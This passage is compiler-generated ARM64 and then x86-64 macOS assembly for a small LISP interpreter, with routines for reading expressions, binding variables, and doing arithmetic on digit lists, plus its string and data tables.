; in Loop: Header=BB35_6 Depth=1 b LBB35_21 LBB35_17: ; in Loop: Header=BB35_6 Depth=1 ldur x9, [x29, #-16] mov x8, #32 subs x8, x8, x9 cset w8, ge tbnz w8, #0, LBB35_20 b LBB35_18 LBB35_18: ; in Loop: Header=BB35_6 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #127 cset w8, ge tbnz w8, #0, LBB35_20 b LBB35_19 LBB35_19: ; in Loop: Header=BB35_6 Depth=1 ldur x0, [x29, #-16] ldur x1, [x29, #-24] bl _cons stur x0, [x29, #-24] b LBB35_20 LBB35_20: ; in Loop: Header=BB35_6 Depth=1 b LBB35_21 LBB35_21: ; in Loop: Header=BB35_6 Depth=1 b LBB35_6 LBB35_22: ldr x9, [sp, #24] ; 8-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x10, [x9] ldr x8, [x8, x10, lsl #3] str x8, [x9] stur xzr, [x29, #-8] b LBB35_23 LBB35_23: ldur x0, [x29, #-8] ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .globl _read_expr ; -- Begin function read_expr .p2align 2 _read_expr: ; @read_expr .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] bl _read_word str x0, [sp, #24] ldr x8, [sp, #24] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB36_2 b LBB36_1 LBB36_1: ldr x8, [sp, #24] stur x8, [x29, #-8] b LBB36_14 LBB36_2: ldr x8, [sp, #24] adrp x9, _right_paren@GOTPAGE ldr x9, [x9, _right_paren@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB36_6 b LBB36_3 LBB36_3: ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB36_5 b LBB36_4 LBB36_4: ldr x8, [sp, #24] stur x8, [x29, #-8] b LBB36_14 LBB36_5: stur xzr, [x29, #-8] b LBB36_14 LBB36_6: ldr x8, [sp, #24] adrp x9, _left_paren@GOTPAGE ldr x9, [x9, _left_paren@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB36_13 b LBB36_7 LBB36_7: mov x1, #0 mov x0, x1 bl _cons str x0, [sp, #8] str x0, [sp, #16] b LBB36_8 LBB36_8: ; =>This Inner Loop Header: Depth=1 mov x0, #1 bl _read_expr str x0, [sp] adrp x8, _right_paren@GOTPAGE ldr x8, [x8, _right_paren@GOTPAGEOFF] ldr x8, [x8] subs x8, x0, x8 cset w8, eq tbnz w8, #0, LBB36_12 b LBB36_9 LBB36_9: ; in Loop: Header=BB36_8 Depth=1 ldr x8, [sp] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB36_11 b LBB36_10 LBB36_10: ldr x8, [sp] stur x8, [x29, #-8] b LBB36_14 LBB36_11: ; in Loop: Header=BB36_8 Depth=1 ldr x0, [sp] mov x1, #0 bl _cons ldr x9, [sp, #8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] str x0, [x8, x9, lsl #3] str x0, [sp, #8] b LBB36_8 LBB36_12: ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-8] b LBB36_14 LBB36_13: ldr x8, [sp, #24] stur x8, [x29, #-8] b LBB36_14 LBB36_14: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _sub1 ; -- Begin function sub1 .p2align 2 _sub1: ; @sub1 .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill str x0, [sp, #16] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB37_2 b LBB37_1 LBB37_1: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB37_8 LBB37_2: ldr x9, [sp, #16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #49 cset w8, ne tbnz w8, #0, LBB37_5 b LBB37_3 LBB37_3: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #16] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB37_5 b LBB37_4 LBB37_4: stur xzr, [x29, #-8] b LBB37_8 LBB37_5: ldr x8, [sp, #8] subs x8, x8, #48 cset w8, eq tbnz w8, #0, LBB37_7 b LBB37_6 LBB37_6: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] subs x0, x9, #1 ldr x9, [sp, #16] ldr x1, [x8, x9, lsl #3] bl _cons stur x0, [x29, #-8] b LBB37_8 LBB37_7: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #16] ldr x0, [x8, x9, lsl #3] bl _sub1 mov x1, x0 mov x0, #57 bl _cons stur x0, [x29, #-8] b LBB37_8 LBB37_8: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _clean_env ; -- Begin function clean_env .p2align 2 _clean_env: ; @clean_env .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _vlst@GOTPAGE ldr x8, [x8, _vlst@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill adrp x8, _obj_lst@GOTPAGE ldr x8, [x8, _obj_lst@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] b LBB38_1 LBB38_1: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB38_3 b LBB38_2 LBB38_2: ; in Loop: Header=BB38_1 Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload ldur x10, [x29, #-8] adrp x9, _car@GOTPAGE ldr x9, [x9, _car@GOTPAGEOFF] ldr x9, [x9, x10, lsl #3] str x9, [sp, #16] ldr x0, [sp, #16] ldr x9, [sp, #16] ldr x1, [x8, x9, lsl #3] bl _cons ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x9, [sp, #16] str x0, [x8, x9, lsl #3] ldur x9, [x29, #-8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-8] b LBB38_1 LBB38_3: ldr x8, [sp, #8] ; 8-byte Folded Reload adrp x9, _wrd_nil@GOTPAGE ldr x9, [x9, _wrd_nil@GOTPAGEOFF] ldr x9, [x9] ldr x10, [x8, x9, lsl #3] adrp x9, _car@GOTPAGE ldr x9, [x9, _car@GOTPAGEOFF] mov x8, #0 str x8, [x9, x10, lsl #3] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _restore_env ; -- Begin function restore_env .p2align 2 _restore_env: ; @restore_env .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 adrp x8, _vlst@GOTPAGE ldr x8, [x8, _vlst@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill adrp x8, _obj_lst@GOTPAGE ldr x8, [x8, _obj_lst@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #24] b LBB39_1 LBB39_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB39_5 b LBB39_2 LBB39_2: ; in Loop: Header=BB39_1 Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x9, [sp] ; 8-byte Folded Reload ldr x11, [sp, #24] adrp x10, _car@GOTPAGE ldr x10, [x10, _car@GOTPAGEOFF] ldr x10, [x10, x11, lsl #3] str x10, [sp, #16] ldr x10, [sp, #16] ldr x9, [x9, x10, lsl #3] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB39_4 b LBB39_3 LBB39_3: ; in Loop: Header=BB39_1 Depth=1 ldr x9, [sp] ; 8-byte Folded Reload ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x10, [sp, #16] ldr x10, [x9, x10, lsl #3] ldr x8, [x8, x10, lsl #3] ldr x10, [sp, #16] str x8, [x9, x10, lsl #3] b LBB39_4 LBB39_4: ; in Loop: Header=BB39_1 Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x9, [sp, #24] ldr x8, [x8, x9, lsl #3] str x8, [sp, #24] b LBB39_1 LBB39_5: add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _bind ; -- Begin function bind .p2align 2 _bind: ; @bind .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] ldur x9, [x29, #-8] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB40_2 b LBB40_1 LBB40_1: b LBB40_4 LBB40_2: ldur x9, [x29, #-8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #16] ldr x1, [x8, x9, lsl #3] bl _bind ldur x9, [x29, #-8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] ldr x9, [sp, #8] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB40_4 b LBB40_3 LBB40_3: ldr x9, [sp, #16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #8] adrp x8, _vlst@GOTPAGE ldr x8, [x8, _vlst@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill ldr x1, [x8, x9, lsl #3] bl _cons ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] str x0, [x8, x9, lsl #3] b LBB40_4 LBB40_4: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _add1 ; -- Begin function add1 .p2align 2 _add1: ; @add1 .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB41_2 b LBB41_1 LBB41_1: mov x0, #49 mov x1, #0 bl _cons stur x0, [x29, #-8] b LBB41_5 LBB41_2: ldr x9, [sp, #16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #57 cset w8, eq tbnz w8, #0, LBB41_4 b LBB41_3 LBB41_3: ldr x8, [sp, #8] add x0, x8, #1 ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x1, [x8, x9, lsl #3] bl _cons stur x0, [x29, #-8] b LBB41_5 LBB41_4: ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _add1 mov x1, x0 mov x0, #48 bl _cons stur x0, [x29, #-8] b LBB41_5 LBB41_5: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _halve ; -- Begin function halve .p2align 2 _halve: ; @halve .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB42_2 b LBB42_1 LBB42_1: ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB42_9 LBB42_2: ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #48 str x8, [sp, #24] ldur x9, [x29, #-16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-16] ldur x0, [x29, #-16] bl _halve str x0, [sp, #8] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB42_4 b LBB42_3 LBB42_3: str xzr, [sp, #16] b LBB42_5 LBB42_4: ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #48 str x8, [sp, #16] b LBB42_5 LBB42_5: ldr x8, [sp, #16] mov x9, #2 sdiv x10, x8, x9 mul x10, x10, x9 subs x8, x8, x10 str x8, [sp, #16] ldr x8, [sp, #24] sdiv x8, x8, x9 add x8, x8, #48 ldr x10, [sp, #16] mov x9, #5 mul x9, x9, x10 add x8, x8, x9 str x8, [sp] ldr x8, [sp] subs x8, x8, #48 cset w8, ne tbnz w8, #0, LBB42_7 b LBB42_6 LBB42_6: ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB42_8 b LBB42_7 LBB42_7: ldr x0, [sp] ldr x1, [sp, #8] bl _cons stur x0, [x29, #-8] b LBB42_9 LBB42_8: stur xzr, [x29, #-8] b LBB42_9 LBB42_9: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _write_atm ; -- Begin function write_atm .p2align 2 _write_atm: ; @write_atm .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB43_2 b LBB43_1 LBB43_1: b LBB43_3 LBB43_2: ldr x9, [sp, #8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _write_atm ldr x9, [sp, #8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _write_chr b LBB43_3 LBB43_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _read_char ; -- Begin function read_char .p2align 2 _read_char: ; @read_char .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x8, #8 str x8, [sp] str xzr, [sp, #16] b LBB44_1 LBB44_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] subs x9, x8, #1 str x9, [sp] subs x8, x8, #0 cset w8, le tbnz w8, #0, LBB44_8 b LBB44_2 LBB44_2: ; in Loop: Header=BB44_1 Depth=1 bl _read_bit str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB44_4 b LBB44_3 LBB44_3: ldr x8, [sp, #8] stur x8, [x29, #-8] b LBB44_9 LBB44_4: ; in Loop: Header=BB44_1 Depth=1 ldr x9, [sp, #8] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB44_6 b LBB44_5 LBB44_5: ; in Loop: Header=BB44_1 Depth=1 mov x8, #1 str x8, [sp, #8] b LBB44_7 LBB44_6: ; in Loop: Header=BB44_1 Depth=1 str xzr, [sp, #8] b LBB44_7 LBB44_7: ; in Loop: Header=BB44_1 Depth=1 ldr x8, [sp, #16] ldr x9, [sp, #16] add x8, x8, x9 ldr x9, [sp, #8] add x8, x8, x9 str x8, [sp, #16] b LBB44_1 LBB44_8: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB44_9 LBB44_9: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _read_word ; -- Begin function read_word .p2align 2 _read_word: ; @read_word .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _buffer2@GOTPAGE ldr x8, [x8, _buffer2@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill ldr x8, [x8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB45_2 b LBB45_1 LBB45_1: adrp x8, _right_paren@GOTPAGE ldr x8, [x8, _right_paren@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] b LBB45_6 LBB45_2: ldr x9, [sp, #8] ; 8-byte Folded Reload ldr x10, [x9] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x10, lsl #3] str x8, [sp, #16] ldr x10, [x9] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x10, lsl #3] str x8, [x9] ldr x0, [sp, #16] bl _only_digits subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB45_4 b LBB45_3 LBB45_3: ldr x0, [sp, #16] bl _remove_leading_zeros bl _mk_numb str x0, [sp, #16] b LBB45_5 LBB45_4: ldr x0, [sp, #16] bl _lookup_word str x0, [sp, #16] b LBB45_5 LBB45_5: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB45_6 LBB45_6: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _next ; @next .zerofill __DATA,__common,_next,8,3 .globl _col ; @col .zerofill __DATA,__common,_col,8,3 .comm _time1,8,3 ; @time1 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "LISP Interpreter Run\n" l_.str.1: ; @.str.1 .asciz "\n" .comm _car,8000000,3 ; @car .comm _cdr,8000000,3 ; @cdr .comm _wrd_define,8,3 ; @wrd_define .comm _atom,2000000,1 ; @atom .comm _wrd_lambda,8,3 ; @wrd_lambda l_.str.2: ; @.str.2 .asciz "define" l_.str.3: ; @.str.3 .asciz "value" .comm _vlst,8000000,3 ; @vlst l_.str.4: ; @.str.4 .asciz "expression" l_.str.5: ; @.str.5 .asciz "()" l_.str.6: ; @.str.6 .asciz "nil != 0\n" l_.str.7: ; @.str.7 .asciz "nil" .comm _wrd_nil,8,3 ; @wrd_nil l_.str.8: ; @.str.8 .asciz "true" .comm _wrd_true,8,3 ; @wrd_true l_.str.9: ; @.str.9 .asciz "false" .comm _wrd_false,8,3 ; @wrd_false l_.str.10: ; @.str.10 .asciz "no-time-limit" .comm _wrd_no_time_limit,8,3 ; @wrd_no_time_limit l_.str.11: ; @.str.11 .asciz "out-of-time" .comm _wrd_out_of_time,8,3 ; @wrd_out_of_time l_.str.12: ; @.str.12 .asciz "out-of-data" .comm _wrd_out_of_data,8,3 ; @wrd_out_of_data l_.str.13: ; @.str.13 .asciz "success" .comm _wrd_success,8,3 ; @wrd_success l_.str.14: ; @.str.14 .asciz "failure" .comm _wrd_failure,8,3 ; @wrd_failure l_.str.15: ; @.str.15 .asciz "let" .comm _wrd_let,8,3 ; @wrd_let l_.str.16: ; @.str.16 .asciz "lambda" l_.str.17: ; @.str.17 .asciz "cadr" .comm _wrd_cadr,8,3 ; @wrd_cadr l_.str.18: ; @.str.18 .asciz "caddr" .comm _wrd_caddr,8,3 ; @wrd_caddr l_.str.19: ; @.str.19 .asciz "'" .comm _wrd_quote,8,3 ; @wrd_quote l_.str.20: ; @.str.20 .asciz "if" .comm _wrd_if,8,3 ; @wrd_if l_.str.21: ; @.str.21 .asciz "car" .comm _wrd_car,8,3 ; @wrd_car l_.str.22: ; @.str.22 .asciz "cdr" .comm _wrd_cdr,8,3 ; @wrd_cdr l_.str.23: ; @.str.23 .asciz "cons" l_.str.24: ; @.str.24 .asciz "atom" l_.str.25: ; @.str.25 .asciz "=" l_.str.26: ; @.str.26 .asciz "display" l_.str.27: ; @.str.27 .asciz "debug" l_.str.28: ; @.str.28 .asciz "append" l_.str.29: ; @.str.29 .asciz "length" l_.str.30: ; @.str.30 .asciz "<" l_.str.31: ; @.str.31 .asciz ">" l_.str.32: ; @.str.32 .asciz "<=" l_.str.33: ; @.str.33 .asciz ">=" l_.str.34: ; @.str.34 .asciz "+" l_.str.35: ; @.str.35 .asciz "*" l_.str.36: ; @.str.36 .asciz "^" l_.str.37: ; @.str.37 .asciz "-" l_.str.38: ; @.str.38 .asciz "base2-to-10" l_.str.39: ; @.str.39 .asciz "base10-to-2" l_.str.40: ; @.str.40 .asciz "size" l_.str.41: ; @.str.41 .asciz "read-bit" l_.str.42: ; @.str.42 .asciz "bits" l_.str.43: ; @.str.43 .asciz "read-exp" l_.str.44: ; @.str.44 .asciz "eval" .comm _wrd_eval,8,3 ; @wrd_eval l_.str.45: ; @.str.45 .asciz "try" .comm _wrd_try,8,3 ; @wrd_try l_.str.46: ; @.str.46 .asciz "[" .comm _left_bracket,8,3 ; @left_bracket l_.str.47: ; @.str.47 .asciz "]" .comm _right_bracket,8,3 ; @right_bracket l_.str.48: ; @.str.48 .asciz "(" .comm _left_paren,8,3 ; @left_paren l_.str.49: ; @.str.49 .asciz ")" .comm _right_paren,8,3 ; @right_paren l_.str.50: ; @.str.50 .asciz "\"" .comm _double_quote,8,3 ; @double_quote .comm _wrd_zero,8,3 ; @wrd_zero .comm _wrd_one,8,3 ; @wrd_one .comm _numb,2000000,1 ; @numb .comm _pname,8000000,3 ; @pname .comm _pf_numb,2000000,1 ; @pf_numb .comm _pf_args,2000000,1 ; @pf_args .comm _obj_lst,8,3 ; @obj_lst l_.str.51: ; @.str.51 .asciz "Storage overflow!\n" l_.str.52: ; @.str.52 .asciz "%-12s" l_.str.53: ; @.str.53 .asciz "\n%-12s" l_.str.54: ; @.str.54 .asciz " " l_.str.55: ; @.str.55 .space 1 .zerofill __DATA,__bss,_in_word2.buffer,8,3 ; @in_word2.buffer .comm _time2,8,3 ; @time2 l_.str.56: ; @.str.56 .asciz "End of LISP Run\n\nElapsed time is %.0f seconds.\n" .comm _turing_machine_tapes,8,3 ; @turing_machine_tapes .comm _display_enabled,8,3 ; @display_enabled .comm _captured_displays,8,3 ; @captured_displays .comm _q,8,3 ; @q .comm _buffer2,8,3 ; @buffer2 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movl $0, -4(%rbp) xorl %eax, %eax movl %eax, %edi callq _time movq %rax, %rcx movq _time1@GOTPCREL(%rip), %rax movq %rcx, (%rax) leaq L_.str(%rip), %rdi movb $0, %al callq _printf callq _initialize_atoms LBB0_1: ## =>This Inner Loop Header: Depth=1 leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _in movq %rax, -16(%rbp) leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -40(%rbp) movq -24(%rbp), %rax movq _wrd_define@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB0_6 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -32(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_5 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -48(%rbp) movq -32(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) movq _wrd_lambda@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -56(%rbp) ## 8-byte Spill movq -48(%rbp), %rax movq %rax, -64(%rbp) ## 8-byte Spill movq -40(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -64(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq -56(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -40(%rbp) LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movq -32(%rbp), %rsi leaq L_.str.2(%rip), %rdi callq _out movq -40(%rbp), %rsi leaq L_.str.3(%rip), %rdi callq _out movq -40(%rbp), %rdx movq -32(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _car@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) jmp LBB0_1 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rsi leaq L_.str.4(%rip), %rdi callq _out movq %rax, -16(%rbp) movq -16(%rbp), %rdi callq _ev movq %rax, %rsi leaq L_.str.3(%rip), %rdi callq _out movq %rax, -16(%rbp) jmp LBB0_1 .cfi_endproc ## -- End function .globl _initialize_atoms ## -- Begin function initialize_atoms .p2align 4, 0x90 _initialize_atoms: ## @initialize_atoms .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp xorl %eax, %eax movl %eax, %edx leaq L_.str.5(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx xorl %eax, %eax ## kill: def $rax killed $eax cmpq %rcx, %rax je LBB1_2 ## %bb.1: leaq L_.str.6(%rip), %rdi xorl %eax, %eax movl %eax, -12(%rbp) ## 4-byte Spill callq _printf movl -12(%rbp), %edi ## 4-byte Reload callq _exit LBB1_2: xorl %eax, %eax movl %eax, %edx leaq L_.str.7(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_nil@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _wrd_nil@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _car@GOTPCREL(%rip), %rax movq $0, (%rax,%rcx,8) xorl %eax, %eax movl %eax, %edx leaq L_.str.8(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_true@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.9(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_false@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.10(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_no_time_limit@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.11(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_out_of_time@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx 